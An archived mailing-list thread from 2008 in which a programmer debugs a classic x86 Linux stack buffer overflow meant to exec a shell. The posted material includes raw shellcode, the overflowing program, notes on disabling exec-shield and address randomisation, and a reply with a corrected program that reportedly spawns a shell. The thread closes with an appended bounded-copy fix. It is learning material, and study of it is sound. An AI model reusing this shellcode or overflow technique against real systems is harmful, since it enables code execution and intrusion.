* buffer overflow
@ 2008-03-11 6:08 Varun Chandramohan
From: Varun Chandramohan @ 2008-03-11 6:08 UTC (permalink / raw)
To: linux-c-programming
Hi all,
Can someone tell me what is wrong with this program? All I
get is a seg fault. I am trying to create a stack overflow and exec a
shell. Somehow it's not working. The system is x86 on Linux.
gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
Copyright (C) 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
The Code:
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

#if 0
char shellcode[] =
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
#endif

char large_string[128];

int main() {
    char buffer[96];
    int i;
    long *long_ptr = (long *) large_string;
    memset(&buffer,0,sizeof(buffer));

    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (long)&buffer;

    for (i = 0; i < strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    strcpy(buffer,large_string);
}
* Re: buffer overflow
From: Patrik Båt, RTL @ 2008-03-11 8:33 UTC (permalink / raw)
To: Varun Chandramohan; +Cc: linux-c-programming

Hello, it has been a long time since I coded some C, but maybe here is some help:

strace ./test <-- use strace to see some more detail...

Here is probably your error...

----- CODE -----
for (i = 0; i < 32; i++)
    *(long_ptr + i) = (long)&buffer;
----- /CODE -----

----- strace -----
execve("./test", ["./test"], [/* 36 vars */]) = 0
brk(0) = 0x804a000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f4c000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=59381, ...}) = 0
mmap2(NULL, 59381, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f3d000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300e\1"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1413540, ...}) = 0
mmap2(NULL, 1418864, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7de2000
mmap2(0xb7f37000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x155) = 0xb7f37000
mmap2(0xb7f3a000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f3a000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7de1000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7de16b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7f37000, 4096, PROT_READ) = 0
munmap(0xb7f3d000, 59381) = 0
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Process 28060 detached
------ /strace ------

Kind regards
Patrik Båt

Tue 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
[...]
* Re: buffer overflow
From: Patrik Båt, RTL @ 2008-03-11 10:04 UTC (permalink / raw)
To: Varun Chandramohan; +Cc: linux-c-programming

Tue 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
[...]
>     strcpy(buffer,large_string);
strcpy(large_string,buffer); //This is working tho...
> }
* Re: buffer overflow
From: Varun Chandramohan @ 2008-03-11 10:41 UTC (permalink / raw)
To: RTL; +Cc: linux-c-programming

Patrik Båt wrote:
> Tue 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
[...]
>>     strcpy(buffer,large_string);
>>
> strcpy(large_string,buffer);
>
> //This is working tho...
>
Thanks for the reply, but this doesn't spawn a shell, does it? This simply avoids the SIGSEGV.
>> }
* Re: buffer overflow
From: Patrik Båt, RTL @ 2008-03-11 12:04 UTC (permalink / raw)
To: Varun Chandramohan; +Cc: linux-c-programming

Yeah, maybe some hardcore C coder in here can help you more...

My primary "tip of the day" was strace ;)

Tue 2008-03-11 at 16:11 +0530, Varun Chandramohan wrote:
> Patrik Båt wrote:
[...]
> > strcpy(large_string,buffer);
> >
> > //This is working tho...
> >
> Thanks for the reply, but this doesn't spawn a shell, does it? This
> simply avoids the SIGSEGV.

-- 
Best regards
RTL CODEHACK Netfilter Firewall
http://rtl.codehack.se
Patrik Båt
Email rtl@codehack.se
Phone +46 85 59 23 751
Cell +46 70 78 22 540
* Re: buffer overflow
From: ninjaboy @ 2008-03-11 12:12 UTC (permalink / raw)
To: Patrik Båt, RTL; +Cc: Varun Chandramohan, linux-c-programming

2008/3/11, Patrik Båt, RTL <rtl@codehack.se>:
> Yeah, maybe some hardcore C coder in here can help you more...
>
> My primary "tip of the day" was strace ;)
[...]
> > Thanks for the reply, but this doesn't spawn a shell, does it? This
> > simply avoids the SIGSEGV.

Maybe stack is not executable?

-- 
noone is alone.
* Re: buffer overflow
From: Varun Chandramohan @ 2008-03-11 13:24 UTC (permalink / raw)
To: ninjaboy; +Cc: "Patrik Båt, RTL", linux-c-programming

ninjaboy wrote:
[...]
> Maybe stack is not executable?
>
Nope, made sure it is... removed all the exec-shield and random VM space protection. :)
[parent not found: <17f2441a0803110649n662264cdp5a4e20361145eac7@mail.gmail.com>]
* Re: buffer overflow
From: Varun Chandramohan @ 2008-03-12 4:28 UTC (permalink / raw)
To: Alfeiks Kaänoken; +Cc: RTL, linux-c-programming

Alfeiks Kaänoken wrote:
> Hi,
> SIGSEGV is OK for your code - it points out that you tried to access
> non-process space - i.e. a wrong pointer address (the system doesn't care
> where it is).
> There is no stack overflow or anything else; you can expect more
> information via a debugger, but
> usually if you get a stack overflow with gdb you get an unknown
> backtrace.
>
> BTW, could you explain your target?
>
My intention was to create a classic buffer overflow as shown in many docs on the internet. But I believe that it doesn't work out of the box because of all the different compiler changes. So I need to know how the stack is organized by my compiler so that I can create the overflow.

Regards,
Varun

> On 11/03/2008, Varun Chandramohan <varunc@linux.vnet.ibm.com> wrote:
[...]
* Re: buffer overflow
From: vincent-perrier @ 2008-03-11 18:32 UTC (permalink / raw)
To: Varun Chandramohan; +Cc: linux-c-programming

This is bad:
    memset(&buffer,0,sizeof(buffer));
buffer is already the address of the space:
    memset(buffer,0,...);
is what I would do.

This is bad too:
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (long)&buffer;
and most certainly does not do what you want.

On Tue, 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
[...]
* Re: buffer overflow
From: Varun Chandramohan @ 2008-03-12 4:29 UTC (permalink / raw)
To: vincent-perrier; +Cc: linux-c-programming

vincent-perrier wrote:
> This is bad:
>     memset(&buffer,0,sizeof(buffer));
> buffer is already the address of the space:
>     memset(buffer,0,...);
> is what I would do.
>
Fine.
> This is bad too:
>     for (i = 0; i < 32; i++)
>         *(long_ptr + i) = (long)&buffer;
> and most certainly does not do what you want.
>
Can you suggest something better to achieve this?
> On Tue, 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
[...]
* Re: buffer overflow
From: nai.xia @ 2008-03-17 8:28 UTC (permalink / raw)
To: linux-c-programming

----- Forwarded message from nai.xia@gmail.com -----

Date: Mon, 17 Mar 2008 16:19:40 +0800
From: nai.xia@gmail.com
Subject: Re: buffer overflow
To: Varun Chandramohan <varunc@linux.vnet.ibm.com>

I think there are three errors in your testing program.

On Tue, Mar 11, 2008 at 11:38:38AM +0530, Varun Chandramohan wrote:
[...]
> char shellcode[] =
>     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>     "\x80\xe8\xdc\xff\xff\xff/bin/sh";

I disassembled the shellcode and I don't think it is valid.

[...]
> char large_string[128];

The string is not _large_ enough. On my Linux box, it takes about 132 bytes
from buffer to the return address, which means you just filled part of the
stack with junk bytes after large_string+127 instead of &buffer.

> int main() {
[...]
>     strcpy(buffer,large_string);
> }

The return behavior of "main" is somewhat different from any other plain
function. Below is taken from my program:

 804846f:  e8 cc fe ff ff    call   8048340 <strcpy@plt>
 8048474:  83 ec 80          sub    $0xffffff80,%esp
 8048477:  59                pop    %ecx
 8048478:  5b                pop    %ebx
 8048479:  5d                pop    %ebp
 804847a:  8d 61 fc          lea    -0x4(%ecx),%esp
 804847d:  c3                ret

We can see that it's not a direct "pop" of the stack; the stack is adjusted
with "lea" just before the "ret", so your shellcode address is not filled into
"eip" but into "esp"!

And at last, here is my modified version (successfully got a shell in my box)
of your test program:

#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
    "\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
    "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

#if 0
char shellcode[] =
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
#endif

char large_string[256];

int foo() {
    char buffer[96];
    int i;
    long *long_ptr = (long *) large_string;
    memset(&buffer,0,sizeof(buffer));

    for (i = 0; i < 256/4; i++)
        *(long_ptr + i) = (long)&buffer;

    for (i = 0; i < strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    strcpy(buffer,large_string);
}

int main() {
    foo();
}

----- End forwarded message -----
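Every version of the test program in this thread ends in the same unchecked strcpy of a larger global into a 96-byte stack buffer. As an added example (not code from any poster), here is the same copy with an explicit bound, so an oversized source is rejected and reported instead of written past the end of the frame; the names bounded_copy, fill_frame_buffer, demo_oversized, demo_fits and FRAME_BUF_SIZE are my own, and the inputs are constructed to match the sizes used in the thread.

```c
/* Added example, not from the thread: a bounded replacement for the
 * strcpy(buffer, large_string) pattern discussed above.  All names here
 * are assumptions of this example, not identifiers from the posts. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FRAME_BUF_SIZE 96   /* same size as `buffer' in the original program */

/* Returned to the caller so the decision is visible rather than silent. */
enum copy_status { COPY_OK = 0, COPY_TOO_LONG = -1, COPY_BAD_ARG = -2 };

/* Copies src (including its NUL) into dst only if it fits in dst_size bytes.
 * memchr never scans past dst_size bytes, so an unterminated source like the
 * thread's 128-byte large_string cannot make the length check itself overrun.
 * On rejection dst becomes an empty string, so even a caller that ignores the
 * status still holds a well-formed C string instead of a smashed frame. */
static enum copy_status bounded_copy(char *dst, size_t dst_size, const char *src)
{
    const char *nul;
    size_t n;

    if (dst == NULL || src == NULL || dst_size == 0)
        return COPY_BAD_ARG;
    nul = memchr(src, '\0', dst_size);
    if (nul == NULL) {            /* no terminator within the room we have */
        dst[0] = '\0';
        return COPY_TOO_LONG;
    }
    n = (size_t)(nul - src);
    memcpy(dst, src, n + 1);      /* n bytes plus the terminating NUL */
    return COPY_OK;
}

/* Mirrors the original frame: a 96-byte local filled from a caller-supplied
 * string.  Reports the status and how many bytes actually landed in the local. */
static enum copy_status fill_frame_buffer(const char *input, size_t *copied_len)
{
    char buffer[FRAME_BUF_SIZE];
    enum copy_status st = bounded_copy(buffer, sizeof buffer, input);

    if (copied_len != NULL)
        *copied_len = strlen(buffer);
    return st;
}

/* Constructed input: a 128-byte global like the thread's large_string, holding
 * 127 non-NUL bytes, which is more than the 96-byte frame buffer can take. */
static enum copy_status demo_oversized(size_t *copied_len)
{
    static char large_string[128];

    memset(large_string, 'A', sizeof large_string - 1);
    large_string[sizeof large_string - 1] = '\0';
    return fill_frame_buffer(large_string, copied_len);
}

/* Constructed input that fits comfortably: the copy goes through unchanged. */
static enum copy_status demo_fits(size_t *copied_len)
{
    return fill_frame_buffer("/bin/sh", copied_len);
}

int main(void)
{
    size_t len;
    enum copy_status st;

    st = demo_oversized(&len);
    printf("127-byte input: status %d, bytes stored %zu\n", (int)st, len);
    st = demo_fits(&len);
    printf("7-byte input:   status %d, bytes stored %zu\n", (int)st, len);
    return 0;
}
```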